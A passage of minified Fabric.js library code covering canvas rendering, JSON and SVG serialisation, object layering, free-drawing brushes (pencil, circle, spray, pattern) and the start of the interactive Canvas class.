O=this.viewportTransform,U=this.clipPath;this.cancelRequestedRender(),this.calcViewportBoundaries(),this.clearContext(x),j.util.setImageSmoothing(x,this.imageSmoothingEnabled),this.fire("before:render",{ctx:x}),this._renderBackground(x),x.save(),x.transform(O[0],O[1],O[2],O[3],O[4],O[5]),this._renderObjects(x,S),x.restore(),!this.controlsAboveOverlay&&this.interactive&&this.drawControls(x),U&&(U.canvas=this,U.shouldCache(),U._transformDone=!0,U.renderCache({forClipping:!0}),this.drawClipPathOnCanvas(x)),this._renderOverlay(x),this.controlsAboveOverlay&&this.interactive&&this.drawControls(x),this.fire("after:render",{ctx:x})},drawClipPathOnCanvas:function(x){var S=this.viewportTransform,O=this.clipPath;x.save(),x.transform(S[0],S[1],S[2],S[3],S[4],S[5]),x.globalCompositeOperation="destination-in",O.transform(x),x.scale(1/O.zoomX,1/O.zoomY),x.drawImage(O._cacheCanvas,-O.cacheTranslationX,-O.cacheTranslationY),x.restore()},_renderObjects:function(x,S){var O,U;for(O=0,U=S.length;O<U;++O)S[O]&&S[O].render(x)},_renderBackgroundOrOverlay:function(x,S){var O=this[S+"Color"],U=this[S+"Image"],K=this.viewportTransform,ee=this[S+"Vpt"];if(O||U){if(O){x.save(),x.beginPath(),x.moveTo(0,0),x.lineTo(this.width,0),x.lineTo(this.width,this.height),x.lineTo(0,this.height),x.closePath(),x.fillStyle=O.toLive?O.toLive(x,this):O,ee&&x.transform(K[0],K[1],K[2],K[3],K[4],K[5]),x.transform(1,0,0,1,O.offsetX||0,O.offsetY||0);var se=O.gradientTransform||O.patternTransform;se&&x.transform(se[0],se[1],se[2],se[3],se[4],se[5]),x.fill(),x.restore()}U&&(x.save(),ee&&x.transform(K[0],K[1],K[2],K[3],K[4],K[5]),U.render(x),x.restore())}},_renderBackground:function(x){this._renderBackgroundOrOverlay(x,"background")},_renderOverlay:function(x){this._renderBackgroundOrOverlay(x,"overlay")},getCenter:function(){return{top:this.height/2,left:this.width/2}},getCenterPoint:function(){return new j.Point(this.width/2,this.height/2)},centerObjectH:function(x){return this._centerObject(x,new j.Point(this.getCenterPoint().x,x.getCenterPoint().y))},centerObjectV:function(x){return this._centerObject(x,new j.Point(x.getCenterPoint().x,this.getCenterPoint().y))},centerObject:function(x){var S=this.getCenterPoint();return this._centerObject(x,S)},viewportCenterObject:function(x){var S=this.getVpCenter();return this._centerObject(x,S)},viewportCenterObjectH:function(x){var S=this.getVpCenter();return this._centerObject(x,new j.Point(S.x,x.getCenterPoint().y)),this},viewportCenterObjectV:function(x){var S=this.getVpCenter();return this._centerObject(x,new j.Point(x.getCenterPoint().x,S.y))},getVpCenter:function(){var x=this.getCenterPoint(),S=M(this.viewportTransform);return y(x,S)},_centerObject:function(x,S){return x.setPositionByOrigin(S,"center","center"),x.setCoords(),this.renderOnAddRemove&&this.requestRenderAll(),this},toDatalessJSON:function(x){return this.toDatalessObject(x)},toObject:function(x){return this._toObjectMethod("toObject",x)},toDatalessObject:function(x){return this._toObjectMethod("toDatalessObject",x)},_toObjectMethod:function(x,S){var O=this.clipPath,U={version:j.version,objects:this._toObjects(x,S)};return O&&!O.excludeFromExport&&(U.clipPath=this._toObject(this.clipPath,x,S)),E(U,this.__serializeBgOverlay(x,S)),j.util.populateWithProperties(this,U,S),U},_toObjects:function(x,S){return this._objects.filter(function(O){return!O.excludeFromExport}).map(function(O){return this._toObject(O,x,S)},this)},_toObject:function(x,S,O){var U;this.includeDefaultValues||(U=x.includeDefaultValues,x.includeDefaultValues=!1);var K=x[S](O);return this.includeDefaultValues||(x.includeDefaultValues=U),K},__serializeBgOverlay:function(x,S){var O={},U=this.backgroundImage,K=this.overlayImage,ee=this.backgroundColor,se=this.overlayColor;return ee&&ee.toObject?ee.excludeFromExport||(O.background=ee.toObject(S)):ee&&(O.background=ee),se&&se.toObject?se.excludeFromExport||(O.overlay=se.toObject(S)):se&&(O.overlay=se),U&&!U.excludeFromExport&&(O.backgroundImage=this._toObject(U,x,S)),K&&!K.excludeFromExport&&(O.overlayImage=this._toObject(K,x,S)),O},svgViewportTransformation:!0,toSVG:function(x,S){x||(x={}),x.reviver=S;var O=[];return this._setSVGPreamble(O,x),this._setSVGHeader(O,x),this.clipPath&&O.push('<g clip-path="url(#'+this.clipPath.clipPathId+')" >\n'),this._setSVGBgOverlayColor(O,"background"),this._setSVGBgOverlayImage(O,"backgroundImage",S),this._setSVGObjects(O,S),this.clipPath&&O.push("</g>\n"),this._setSVGBgOverlayColor(O,"overlay"),this._setSVGBgOverlayImage(O,"overlayImage",S),O.push("</svg>"),O.join("")},_setSVGPreamble:function(x,S){S.suppressPreamble||x.push('<?xml version="1.0" encoding="',S.encoding||"UTF-8",'" standalone="no" ?>\n','<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" ','"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">\n')},_setSVGHeader:function(x,S){var K,O=S.width||this.width,U=S.height||this.height,ee='viewBox="0 0 '+this.width+" "+this.height+'" ',se=j.Object.NUM_FRACTION_DIGITS;S.viewBox?ee='viewBox="'+S.viewBox.x+" "+S.viewBox.y+" "+S.viewBox.width+" "+S.viewBox.height+'" ':this.svgViewportTransformation&&(ee='viewBox="'+_(-(K=this.viewportTransform)[4]/K[0],se)+" "+_(-K[5]/K[3],se)+" "+_(this.width/K[0],se)+" "+_(this.height/K[3],se)+'" '),x.push("<svg ",'xmlns="http://www.w3.org/2000/svg" ','xmlns:xlink="http://www.w3.org/1999/xlink" ','version="1.1" ','width="',O,'" ','height="',U,'" ',ee,'xml:space="preserve">\n',"<desc>Created with Fabric.js ",j.version,"</desc>\n","<defs>\n",this.createSVGFontFacesMarkup(),this.createSVGRefElementsMarkup(),this.createSVGClipPathMarkup(S),"</defs>\n")},createSVGClipPathMarkup:function(x){var S=this.clipPath;return S?(S.clipPathId="CLIPPATH_"+j.Object.__uid++,'<clipPath id="'+S.clipPathId+'" >\n'+this.clipPath.toClipPathSVG(x.reviver)+"</clipPath>\n"):""},createSVGRefElementsMarkup:function(){var x=this;return["background","overlay"].map(function(O){var U=x[O+"Color"];if(U&&U.toLive){var K=x[O+"Vpt"],ee=x.viewportTransform;return U.toSVG({width:x.width/(K?ee[0]:1),height:x.height/(K?ee[3]:1)},{additionalTransform:K?j.util.matrixToSVG(ee):""})}}).join("")},createSVGFontFacesMarkup:function(){var O,U,K,ee,se,le,ye,z,x="",S={},l=j.fontPaths,f=[];for(this._objects.forEach(function v(P){f.push(P),P._objects&&P._objects.forEach(v)}),ye=0,z=f.length;ye<z;ye++)if(U=(O=f[ye]).fontFamily,-1!==O.type.indexOf("text")&&!S[U]&&l[U]&&(S[U]=!0,O.styles))for(se in K=O.styles)for(le in ee=K[se])!S[U=ee[le].fontFamily]&&l[U]&&(S[U]=!0);for(var A in S)x+=["\t\t@font-face {\n","\t\t\tfont-family: '",A,"';\n","\t\t\tsrc: url('",l[A],"');\n","\t\t}\n"].join("");return x&&(x=['\t<style type="text/css">',"<![CDATA[\n",x,"]]>","</style>\n"].join("")),x},_setSVGObjects:function(x,S){var O,U,K,ee=this._objects;for(U=0,K=ee.length;U<K;U++)!(O=ee[U]).excludeFromExport&&this._setSVGObject(x,O,S)},_setSVGObject:function(x,S,O){x.push(S.toSVG(O))},_setSVGBgOverlayImage:function(x,S,O){this[S]&&!this[S].excludeFromExport&&this[S].toSVG&&x.push(this[S].toSVG(O))},_setSVGBgOverlayColor:function(x,S){var O=this[S+"Color"],K=this.width,ee=this.height;if(O)if(O.toLive){var se=O.repeat,ve=j.util.invertTransform(this.viewportTransform),ye=this[S+"Vpt"]?j.util.matrixToSVG(ve):"";x.push('<rect transform="'+ye+" translate(",K/2,",",ee/2,')"',' x="',O.offsetX-K/2,'" y="',O.offsetY-ee/2,'" ','width="',"repeat-y"===se||"no-repeat"===se?O.source.width:K,'" height="',"repeat-x"===se||"no-repeat"===se?O.source.height:ee,'" fill="url(#SVGID_'+O.id+')"',"></rect>\n")}else x.push('<rect x="0" y="0" width="100%" height="100%" ','fill="',O,'"',"></rect>\n")},sendToBack:function(x){if(!x)return this;var O,U,K,S=this._activeObject;if(x===S&&"activeSelection"===x.type)for(O=(K=S._objects).length;O--;)b(this._objects,U=K[O]),this._objects.unshift(U);else b(this._objects,x),this._objects.unshift(x);return this.renderOnAddRemove&&this.requestRenderAll(),this},bringToFront:function(x){if(!x)return this;var O,U,K,S=this._activeObject;if(x===S&&"activeSelection"===x.type)for(K=S._objects,O=0;O<K.length;O++)b(this._objects,U=K[O]),this._objects.push(U);else b(this._objects,x),this._objects.push(x);return this.renderOnAddRemove&&this.requestRenderAll(),this},sendBackwards:function(x,S){if(!x)return this;var U,K,ee,se,ve,O=this._activeObject,le=0;if(x===O&&"activeSelection"===x.type)for(ve=O._objects,U=0;U<ve.length;U++)(ee=this._objects.indexOf(K=ve[U]))>0+le&&(se=ee-1,b(this._objects,K),this._objects.splice(se,0,K)),le++;else 0!==(ee=this._objects.indexOf(x))&&(se=this._findNewLowerIndex(x,ee,S),b(this._objects,x),this._objects.splice(se,0,x));return this.renderOnAddRemove&&this.requestRenderAll(),this},_findNewLowerIndex:function(x,S,O){var U,K;if(O){for(U=S,K=S-1;K>=0;--K)if(x.intersectsWithObject(this._objects[K])||x.isContainedWithinObject(this._objects[K])||this._objects[K].isContainedWithinObject(x)){U=K;break}}else U=S-1;return U},bringForward:function(x,S){if(!x)return this;var U,K,ee,se,ve,O=this._activeObject,le=0;if(x===O&&"activeSelection"===x.type)for(U=(ve=O._objects).length;U--;)(ee=this._objects.indexOf(K=ve[U]))<this._objects.length-1-le&&(se=ee+1,b(this._objects,K),this._objects.splice(se,0,K)),le++;else(ee=this._objects.indexOf(x))!==this._objects.length-1&&(se=this._findNewUpperIndex(x,ee,S),b(this._objects,x),this._objects.splice(se,0,x));return this.renderOnAddRemove&&this.requestRenderAll(),this},_findNewUpperIndex:function(x,S,O){var U,K,ee;if(O){for(U=S,K=S+1,ee=this._objects.length;K<ee;++K)if(x.intersectsWithObject(this._objects[K])||x.isContainedWithinObject(this._objects[K])||this._objects[K].isContainedWithinObject(x)){U=K;break}}else U=S+1;return U},moveTo:function(x,S){return b(this._objects,x),this._objects.splice(S,0,x),this.renderOnAddRemove&&this.requestRenderAll()},dispose:function(){return this.isRendering&&(j.util.cancelAnimFrame(this.isRendering),this.isRendering=0),this.forEachObject(function(x){x.dispose&&x.dispose()}),this._objects=[],this.backgroundImage&&this.backgroundImage.dispose&&this.backgroundImage.dispose(),this.backgroundImage=null,this.overlayImage&&this.overlayImage.dispose&&this.overlayImage.dispose(),this.overlayImage=null,this._iTextInstances=null,this.contextContainer=null,this.lowerCanvasEl.classList.remove("lower-canvas"),j.util.setStyle(this.lowerCanvasEl,this._originalCanvasStyle),delete this._originalCanvasStyle,this.lowerCanvasEl.setAttribute("width",this.width),this.lowerCanvasEl.setAttribute("height",this.height),j.util.cleanUpJsdomNode(this.lowerCanvasEl),this.lowerCanvasEl=void 0,this},toString:function(){return"#<fabric.Canvas ("+this.complexity()+"): { objects: "+this._objects.length+" }>"}}),E(j.StaticCanvas.prototype,j.Observable),E(j.StaticCanvas.prototype,j.Collection),E(j.StaticCanvas.prototype,j.DataURLExporter),E(j.StaticCanvas,{EMPTY_JSON:'{"objects": [], "background": "white"}',supports:function(x){var S=D();if(!S||!S.getContext)return null;var O=S.getContext("2d");return O&&"setLineDash"===x?void 0!==O.setLineDash:null}}),j.StaticCanvas.prototype.toJSON=j.StaticCanvas.prototype.toObject,j.isLikelyNode&&(j.StaticCanvas.prototype.createPNGStream=function(){var x=p(this.lowerCanvasEl);return x&&x.createPNGStream()},j.StaticCanvas.prototype.createJPEGStream=function(x){var S=p(this.lowerCanvasEl);return S&&S.createJPEGStream(x)})}}(),j.BaseBrush=j.util.createClass({color:"rgb(0, 0, 0)",width:1,shadow:null,strokeLineCap:"round",strokeLineJoin:"round",strokeMiterLimit:10,strokeDashArray:null,limitedToCanvasSize:!1,_setBrushStyles:function(E){E.strokeStyle=this.color,E.lineWidth=this.width,E.lineCap=this.strokeLineCap,E.miterLimit=this.strokeMiterLimit,E.lineJoin=this.strokeLineJoin,E.setLineDash(this.strokeDashArray||[])},_saveAndTransform:function(E){var g=this.canvas.viewportTransform;E.save(),E.transform(g[0],g[1],g[2],g[3],g[4],g[5])},_setShadow:function(){if(this.shadow){var E=this.canvas,g=this.shadow,b=E.contextTop,_=E.getZoom();E&&E._isRetinaScaling()&&(_*=j.devicePixelRatio),b.shadowColor=g.color,b.shadowBlur=g.blur*_,b.shadowOffsetX=g.offsetX*_,b.shadowOffsetY=g.offsetY*_}},needsFullRender:function(){return new j.Color(this.color).getAlpha()<1||!!this.shadow},_resetShadow:function(){var E=this.canvas.contextTop;E.shadowColor="",E.shadowBlur=E.shadowOffsetX=E.shadowOffsetY=0},_isOutSideCanvas:function(E){return E.x<0||E.x>this.canvas.getWidth()||E.y<0||E.y>this.canvas.getHeight()}}),j.PencilBrush=j.util.createClass(j.BaseBrush,{decimate:.4,drawStraightLine:!1,straightLineKey:"shiftKey",initialize:function(E){this.canvas=E,this._points=[]},needsFullRender:function(){return this.callSuper("needsFullRender")||this._hasStraightLine},_drawSegment:function(E,g,b){var _=g.midPointFrom(b);return E.quadraticCurveTo(g.x,g.y,_.x,_.y),_},onMouseDown:function(E,g){!this.canvas._isMainEvent(g.e)||(this.drawStraightLine=g.e[this.straightLineKey],this._prepareForDrawing(E),this._captureDrawingPath(E),this._render())},onMouseMove:function(E,g){if(this.canvas._isMainEvent(g.e)&&(this.drawStraightLine=g.e[this.straightLineKey],(!0!==this.limitedToCanvasSize||!this._isOutSideCanvas(E))&&this._captureDrawingPath(E)&&this._points.length>1))if(this.needsFullRender())this.canvas.clearContext(this.canvas.contextTop),this._render();else{var b=this._points,_=b.length,y=this.canvas.contextTop;this._saveAndTransform(y),this.oldEnd&&(y.beginPath(),y.moveTo(this.oldEnd.x,this.oldEnd.y)),this.oldEnd=this._drawSegment(y,b[_-2],b[_-1],!0),y.stroke(),y.restore()}},onMouseUp:function(E){return!this.canvas._isMainEvent(E.e)||(this.drawStraightLine=!1,this.oldEnd=void 0,this._finalizeAndAddPath(),!1)},_prepareForDrawing:function(E){var g=new j.Point(E.x,E.y);this._reset(),this._addPoint(g),this.canvas.contextTop.moveTo(g.x,g.y)},_addPoint:function(E){return!(this._points.length>1&&E.eq(this._points[this._points.length-1])||(this.drawStraightLine&&this._points.length>1&&(this._hasStraightLine=!0,this._points.pop()),this._points.push(E),0))},_reset:function(){this._points=[],this._setBrushStyles(this.canvas.contextTop),this._setShadow(),this._hasStraightLine=!1},_captureDrawingPath:function(E){var g=new j.Point(E.x,E.y);return this._addPoint(g)},_render:function(E){var g,b,_=this._points[0],y=this._points[1];if(this._saveAndTransform(E=E||this.canvas.contextTop),E.beginPath(),2===this._points.length&&_.x===y.x&&_.y===y.y){var M=this.width/1e3;_=new j.Point(_.x,_.y),y=new j.Point(y.x,y.y),_.x-=M,y.x+=M}for(E.moveTo(_.x,_.y),g=1,b=this._points.length;g<b;g++)this._drawSegment(E,_,y),_=this._points[g],y=this._points[g+1];E.lineTo(_.x,_.y),E.stroke(),E.restore()},convertPointsToSVGPath:function(E){return j.util.getSmoothPathFromPoints(E,this.width/1e3)},_isEmptySVGPath:function(E){return"M 0 0 Q 0 0 0 0 L 0 0"===j.util.joinPath(E)},createPath:function(E){var g=new j.Path(E,{fill:null,stroke:this.color,strokeWidth:this.width,strokeLineCap:this.strokeLineCap,strokeMiterLimit:this.strokeMiterLimit,strokeLineJoin:this.strokeLineJoin,strokeDashArray:this.strokeDashArray});return this.shadow&&(this.shadow.affectStroke=!0,g.shadow=new j.Shadow(this.shadow)),g},decimatePoints:function(E,g){if(E.length<=2)return E;var y,b=this.canvas.getZoom(),_=Math.pow(g/b,2),M=E.length-1,p=E[0],D=[p];for(y=1;y<M-1;y++)Math.pow(p.x-E[y].x,2)+Math.pow(p.y-E[y].y,2)>=_&&D.push(p=E[y]);return D.push(E[M]),D},_finalizeAndAddPath:function(){this.canvas.contextTop.closePath(),this.decimate&&(this._points=this.decimatePoints(this._points,this.decimate));var g=this.convertPointsToSVGPath(this._points);if(this._isEmptySVGPath(g))this.canvas.requestRenderAll();else{var b=this.createPath(g);this.canvas.clearContext(this.canvas.contextTop),this.canvas.fire("before:path:created",{path:b}),this.canvas.add(b),this.canvas.requestRenderAll(),b.setCoords(),this._resetShadow(),this.canvas.fire("path:created",{path:b})}}}),j.CircleBrush=j.util.createClass(j.BaseBrush,{width:10,initialize:function(E){this.canvas=E,this.points=[]},drawDot:function(E){var g=this.addPoint(E),b=this.canvas.contextTop;this._saveAndTransform(b),this.dot(b,g),b.restore()},dot:function(E,g){E.fillStyle=g.fill,E.beginPath(),E.arc(g.x,g.y,g.radius,0,2*Math.PI,!1),E.closePath(),E.fill()},onMouseDown:function(E){this.points.length=0,this.canvas.clearContext(this.canvas.contextTop),this._setShadow(),this.drawDot(E)},_render:function(){var g,b,E=this.canvas.contextTop,_=this.points;for(this._saveAndTransform(E),g=0,b=_.length;g<b;g++)this.dot(E,_[g]);E.restore()},onMouseMove:function(E){!0===this.limitedToCanvasSize&&this._isOutSideCanvas(E)||(this.needsFullRender()?(this.canvas.clearContext(this.canvas.contextTop),this.addPoint(E),this._render()):this.drawDot(E))},onMouseUp:function(){var g,b,E=this.canvas.renderOnAddRemove;this.canvas.renderOnAddRemove=!1;var _=[];for(g=0,b=this.points.length;g<b;g++){var y=this.points[g],M=new j.Circle({radius:y.radius,left:y.x,top:y.y,originX:"center",originY:"center",fill:y.fill});this.shadow&&(M.shadow=new j.Shadow(this.shadow)),_.push(M)}var p=new j.Group(_);p.canvas=this.canvas,this.canvas.fire("before:path:created",{path:p}),this.canvas.add(p),this.canvas.fire("path:created",{path:p}),this.canvas.clearContext(this.canvas.contextTop),this._resetShadow(),this.canvas.renderOnAddRemove=E,this.canvas.requestRenderAll()},addPoint:function(E){var g=new j.Point(E.x,E.y),b=j.util.getRandomInt(Math.max(0,this.width-20),this.width+20)/2,_=new j.Color(this.color).setAlpha(j.util.getRandomInt(0,100)/100).toRgba();return g.radius=b,g.fill=_,this.points.push(g),g}}),j.SprayBrush=j.util.createClass(j.BaseBrush,{width:10,density:20,dotWidth:1,dotWidthVariance:1,randomOpacity:!1,optimizeOverlapping:!0,initialize:function(E){this.canvas=E,this.sprayChunks=[]},onMouseDown:function(E){this.sprayChunks.length=0,this.canvas.clearContext(this.canvas.contextTop),this._setShadow(),this.addSprayChunk(E),this.render(this.sprayChunkPoints)},onMouseMove:function(E){!0===this.limitedToCanvasSize&&this._isOutSideCanvas(E)||(this.addSprayChunk(E),this.render(this.sprayChunkPoints))},onMouseUp:function(){var E=this.canvas.renderOnAddRemove;this.canvas.renderOnAddRemove=!1;for(var g=[],b=0,_=this.sprayChunks.length;b<_;b++)for(var y=this.sprayChunks[b],M=0,p=y.length;M<p;M++){var D=new j.Rect({width:y[M].width,height:y[M].width,left:y[M].x+1,top:y[M].y+1,originX:"center",originY:"center",fill:this.color});g.push(D)}this.optimizeOverlapping&&(g=this._getOptimizedRects(g));var w=new j.Group(g);this.shadow&&w.set("shadow",new j.Shadow(this.shadow)),this.canvas.fire("before:path:created",{path:w}),this.canvas.add(w),this.canvas.fire("path:created",{path:w}),this.canvas.clearContext(this.canvas.contextTop),this._resetShadow(),this.canvas.renderOnAddRemove=E,this.canvas.requestRenderAll()},_getOptimizedRects:function(E){var b,_,y,g={};for(_=0,y=E.length;_<y;_++)g[b=E[_].left+""+E[_].top]||(g[b]=E[_]);var M=[];for(b in g)M.push(g[b]);return M},render:function(E){var b,_,g=this.canvas.contextTop;for(g.fillStyle=this.color,this._saveAndTransform(g),b=0,_=E.length;b<_;b++){var y=E[b];void 0!==y.opacity&&(g.globalAlpha=y.opacity),g.fillRect(y.x,y.y,y.width,y.width)}g.restore()},_render:function(){var g,b,E=this.canvas.contextTop;for(E.fillStyle=this.color,this._saveAndTransform(E),g=0,b=this.sprayChunks.length;g<b;g++)this.render(this.sprayChunks[g]);E.restore()},addSprayChunk:function(E){this.sprayChunkPoints=[];var g,b,_,M,y=this.width/2;for(M=0;M<this.density;M++){g=j.util.getRandomInt(E.x-y,E.x+y),b=j.util.getRandomInt(E.y-y,E.y+y),_=this.dotWidthVariance?j.util.getRandomInt(Math.max(1,this.dotWidth-this.dotWidthVariance),this.dotWidth+this.dotWidthVariance):this.dotWidth;var p=new j.Point(g,b);p.width=_,this.randomOpacity&&(p.opacity=j.util.getRandomInt(0,100)/100),this.sprayChunkPoints.push(p)}this.sprayChunks.push(this.sprayChunkPoints)}}),j.PatternBrush=j.util.createClass(j.PencilBrush,{getPatternSrc:function(){var b=j.util.createCanvasElement(),_=b.getContext("2d");return b.width=b.height=25,_.fillStyle=this.color,_.beginPath(),_.arc(10,10,10,0,2*Math.PI,!1),_.closePath(),_.fill(),b},getPatternSrcFunction:function(){return String(this.getPatternSrc).replace("this.color",'"'+this.color+'"')},getPattern:function(E){return E.createPattern(this.source||this.getPatternSrc(),"repeat")},_setBrushStyles:function(E){this.callSuper("_setBrushStyles",E),E.strokeStyle=this.getPattern(E)},createPath:function(E){var g=this.callSuper("createPath",E),b=g._getLeftTopCoords().scalarAdd(g.strokeWidth/2);return g.stroke=new j.Pattern({source:this.source||this.getPatternSrcFunction(),offsetX:-b.x,offsetY:-b.y}),g}}),function(){var E=j.util.getPointer,g=j.util.degreesToRadians,b=j.util.isTouchEvent;for(var _ in j.Canvas=j.util.createClass(j.StaticCanvas,{initialize:function(y,M){M||(M={}),this.renderAndResetBound=this.renderAndReset.bind(this),this.requestRenderAllBound=this.requestRenderAll.bind(this),this._initStatic(y,M),this._initInteractive(),this._createCacheCanvas()},uniformScaling:!0,uniScaleKey:"shiftKey",centeredScaling:!1,centeredRotation:!1,centeredKey:"altKey",altActionKey:"shiftKey",interactive:!0,selection:!0,selectionKey:"shiftKey",altSelectionKey:null,selectionColor:"rgba(100, 100, 255, 0.3)",selectionDashArray:[],selectionBorderColor:"rgba(255, 255, 255, 0.3)",selectionLineWidth:1,selectionFullyContained:!1,hoverCursor:"move",moveCursor:"move",defaultCursor:"default",freeDrawingCursor:"crosshair",notAllowedCursor:"not-allowed",containerClass:"canvas-container",perPixelTargetFind:!1,targetFindTolerance:0,skipTargetFind:!1,isDrawingMode:!1,preserveObjectStacking:!1,snapAngle:0,snapThreshold:null,stopContextMenu:!1,fireRightClick:!1,fireMiddleClick:!1,targets:[],enablePointerEvents:!1,_hoveredTarget:null,_hoveredTargets:[],_initInteractive:function(){this._currentTransform=null,this._groupSelector=null,this._initWrapperElement(),this._createUpperCanvas(),this._initEventListeners(),this._initRetinaScaling(),this.freeDrawingBrush=j.PencilBrush&&new j.PencilBrush(this),this.calcOffset()},_chooseObjectsToRender:function(){var M,p,D,y=this.getActiveObjects();if(y.length>0&&!this.preserveObjectStacking){p=[],D=[];for(var w=0,x=this._objects.length;w<x;w++)-1===y.indexOf(M=this._objects[w])?p.push(M):D.push(M);y.length>1&&(this._activeObject._objects=D),p.push.apply(p,D)}else p=this._objects;return p},renderAll:function(){return this.contextTopDirty&&!this._groupSelector&&!this.isDrawingMode&&(this.clearContext(this.contextTop),this.contextTopDirty=!1),this.hasLostContext&&(this.renderTopLayer(this.contextTop),this.hasLostContext=!1),this.renderCanvas(this.contextContainer,this._chooseObjectsToRender()),this},renderTopLayer:function(y){y.save(),this.isDrawingMode&&this._isCurrentlyDrawing&&(this.freeDrawingBrush&&this.freeDrawingBrush._render(),this.contextTopDirty=!0),this.selection&&this._groupSelector&&(this._drawSelection(y),this.contextTopDirty=!0),y.restore()},renderTop:function(){var y=this.contextTop;return this.clearContext(y),this.renderTopLayer(y),this.fire("after:render"),this},_normalizePointer:function(y,M){var p=y.calcTransformMatrix(),D=j.util.invertTransform(p),w=this.restorePointerVpt(M);return j.util.transformPoint(w,D)},isTargetTransparent:function(y,M,p){if(y.shouldCache()&&y._cacheCanvas&&y!==this._activeObject){var D=this._normalizePointer(y,{x:M,y:p}),w=Math.max(y.cacheTranslationX+D.x*y.zoomX,0),x=Math.max(y.cacheTranslationY+D.y*y.zoomY,0);return j.util.isTransparent(y._cacheContext,Math.round(w),Math.round(x),this.targetFindTolerance)}var S=this.contextCache,O=y.selectionBackgroundColor,U=this.viewportTransform;return y.selectionBackgroundColor="",this.clearContext(S),S.save(),S.transform(U[0],U[1],U[2],U[3],U[4],U[5]),y.render(S),S.restore(),y.selectionBackgroundColor=O,j.util.isTransparent(S,M,p,this.targetFindTolerance)},_isSelectionKeyPressed:function(y){return Array.isArray(this.selectionKey)?!!this.selectionKey.find(function(p){return!0===y[p]}):y[this.selectionKey]},_shouldClearSelection:function(y,M){var p=this.getActiveObjects(),D=this._activeObject;return!M||M&&D&&p.length>1&&-1===p.indexOf(M)&&D!==M&&!this._isSelectionKeyPressed(y)||M&&!M.evented||M&&!M.selectable&&D&&D!==M},_shouldCenterTransform:function(y,M,p){var D;if(y)return"scale"===M||"scaleX"===M||"scaleY"===M||"resizing"===M?D=this.centeredScaling||y.centeredScaling:"rotate"===M&&(D=this.centeredRotation||y.centeredRotation),D?!p:p},_getOriginFromCorner:function(y,M){var p={x:y.originX,y:y.originY};return"ml"===M||"tl"===M||"bl"===M?p.x="right":("mr"===M||"tr"===M||"br"===M)&&(p.x="left"),"tl"===M||"mt"===M||"tr"===M?p.y="bottom":("bl"===M||"mb"===M||"br"===M)&&(p.y="top"),p},_getActionFromCorner:function(y,M,p,D){if(!M||!y)return"drag";var w=D.controls[M];return w.getActionName(p,w,D)},_setupCurrentTransform:function(y,M,p){if(M){var D=this.getPointer(y),w=M.__corner,x=M.controls[w],S=p&&w?x.getActionHandler(y,M,x):j.controlsUtils.dragHandler,O=this._getActionFromCorner(p,w,y,M),U=this._getOriginFromCorner(M,w),K=y[this.centeredKey],ee={target:M,action:O,actionHandler:S,corner:w,scaleX:M.scaleX,scaleY:M.scaleY,skewX:M.skewX,skewY:M.skewY,offsetX:D.x-M.left,offsetY:D.y-M.top,originX:U.x,originY:U.y,ex:D.x,ey:D.y,lastX:D.x,lastY:D.y,theta:g(M.angle),width:M.width*M.scaleX,shiftKey:y.shiftKey,altKey:K,original:j.util.saveObjectTransform(M)};this._shouldCenterTransform(M,O,K)&&(ee.originX="center",ee.originY="center"),ee.original.originX=U.x,ee.original.originY=U.y,this._currentTransform=ee,this._beforeTransform(y)}},setCursor:function(y){this.upperCanvasEl.style.cursor=y},_drawSelection:function(y){var M=this._groupSelector,p=new j.Point(M.ex,M.ey),D=j.util.transformPoint(p,this.viewportTransform),w=new j.Point(M.ex+M.left,M.ey+M.top),x=j.util.transformPoint(w,this.viewportTransform),S=Math.min(D.x,x.x),O=Math.min(D.y,x.y),U=Math.max(D.x,x.x),K=Math.max(D.y,x.y),ee=this.selectionLineWidth/2;this.selectionColor&&(y.fillStyle=this.selectionColor,y.fillRect(S,O,U-S,K-O)),this.selectionLineWidth&&this.selectionBorderColor&&(y.lineWidth=this.selectionLineWidth,y.strokeStyle=this.selectionBorderColor,S+=ee,O+=ee,U-=ee,K-=ee,j.Object.prototype._setLineDash.call(this,y,this.selectionDashArray),y.strokeRect(S,O,U-S,K-O))},findTarget:function(y,M){if(!this.skipTargetFind){var S,O,D=this.getPointer(y,!0),w=this._activeObject,x=this.getActiveObjects(),U=b(y),K=x.length>1&&!M||1===x.length;if(this.targets=[],K&&w._findTargetCorner(D,U)||x.length>1&&!M&&w===this._searchPossibleTargets([w],D))return w;if(1===x.length&&w===this._searchPossibleTargets([w],D)){if(!this.preserveObjectStacking)return w;S=w,O=this.targets,this.targets=[]}var ee=this._searchPossibleTargets(this._objects,D);return y[this.altSelectionKey]&&ee&&S&&ee!==S&&(ee=S,this.targets=O),ee}},_checkTarget:function(y,M,p){if(M&&M.visible&&M.evented&&M.containsPoint(y)){if(!this.perPixelTargetFind&&!M.perPixelTargetFind||M.isEditing)return!0;if(!this.isTargetTransparent(M,p.x,p.y))return!0}},_searchPossibleTargets:function(y,M){for(var p,w,D=y.length;D--;){var x=y[D],S=x.group?this._normalizePointer(x.group,M):M;if(this._checkTarget(S,x,M)){(p=y[D]).subTargetCheck&&p instanceof j.Group&&(w=this._searchPossibleTargets(p._objects,M))&&this.targets.push(w);break}}return p},restorePointerVpt:function(y){return j.util.transformPoint(y,j.util.invertTransform(this.viewportTransform))},getPointer:function(y,M){if(this._absolutePointer&&!M)return this._absolutePointer;if(this._pointer&&M)return this._pointer;var O,p=E(y),D=this.upperCanvasEl,w=D.getBoundingClientRect(),x=w.width||0,S=w.height||0;(!x||!S)&&("top"in w&&"bottom"in w&&(S=Math.abs(w.top-w.bottom)),"right"in w&&"left"in w&&(x=Math.abs(w.right-w.left))),this.calcOffset(),p.x=p.x-this._offset.left,p.y=p.y-this._offset.top,M||(p=this.restorePointerVpt(p));var U=this.getRetinaScaling();return 1!==U&&(p.x/=U,p.y/=U),{x:p.x*(O=0===x||0===S?{width:1,height:1}:{width:D.width/x,height:D.height/S}).width,y:p.y*O.height}},_createUpperCanvas:function(){var y=this.lowerCanvasEl.className.replace(/\s*lower-canvas\s*/,""),M=this.lowerCanvasEl,p=this.upperCanvasEl;p?p.className="":(p=this._createCanvasElement(),this.upperCanvasEl=p),j.util.addClass(p,"upper-canvas "+y),this.wrapperEl.appendChild(p),this._copyCanvasStyle(M,p),this._applyCanvasStyle(p),this.contextTop=p.getContext("2d")},getTopContext:function(){return 